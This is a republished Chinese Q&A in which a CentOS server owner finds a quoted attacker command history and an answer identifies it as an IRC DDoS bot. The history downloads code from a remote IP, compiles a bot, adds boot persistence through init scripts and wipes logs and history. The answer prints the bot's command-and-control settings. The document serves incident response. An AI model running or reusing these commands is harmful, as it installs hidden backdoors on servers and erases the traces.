centos – 我的网络服务器是否遭到入侵？

本站教程收集整理的这篇文章主要介绍了centos – 我的网络服务器是否遭到入侵？，本站教程本站觉得挺不错的，现在分享给大家，也给大家做个参考。

参见英文答案 >
How do I deal with a compromised server?13个

我们今天使用Putty远程登录我们的CentOS服务器,在使用向上箭头浏览之前的命令时,偶然发现了以下情况：

unset HISTFILE
mkdir /usr/lib/tmp 
cd /usr/lib/tmp 
wget http://188.72.217.17/mzb.c -o /dev/null
wget http://188.72.217.17/windef.h -o /dev/null
gcc mzb.c -o /bin/bot -lpthread
rm -rf mzb.c
rm -rf windef.h
wget http://188.72.217.17/botsupport.sh -o /dev/null
chmod +x botsupport.sh
mv botsupport.sh /etc/init.d/httpd2
cat /etc/init.d/network > /etc/init.d/network.bp
echo \#\!/bin/sh  >  /etc/init.d/network
echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network
cat /etc/init.d/network.bp >> /etc/init.d/network
cat /dev/null > /var/log/lastlog
history -c
nohup /etc/init.d/httpd2 &

(为了清晰起见,用&换成了换行符)

我永远不会运行这些命令,永远！这是怎么发生的,我的服务器被黑了吗？我立即改变了我的root密码,但是希望有人可以对这里发生的事情做出正面或反面.

我看到源代码中对ddos机器人的引用,我和我的同事都非常关注！

提前致谢！

是的,你被黑了.黑客安装了一个IRC后门,你正在连接到这个IRC服务器：

const  int port      = 1254; 
const char chAnnel[] = "#test";
const char password[]= "pass";
const char server[]  = "heathen.cc";

bot herder可以在您的服务器上执行任何命令.我建议关闭服务器并立即重新安装.机器人有一些DDoS攻击功能,DNS泛洪,同步洪水和ICMP泛滥.它也适用于非常酷的窗户.有一个非常古老的传播模块来感染myDoom.这看起来像一些旧的恶意软件.

本站总结

以上是本站教程为你收集整理的centos – 我的网络服务器是否遭到入侵？全部内容，希望文章能够帮你解决centos – vps云服务器 我的网络服务器是否遭到入侵？所遇到的程序开发问题。

如果觉得本站教程网站内容还不错，欢迎将本站教程推荐给好友。

本图文内容来源于网友网络收集整理提供，作为学习参考使用，版权属于原作者。
如您有任何意见或建议可联系处理。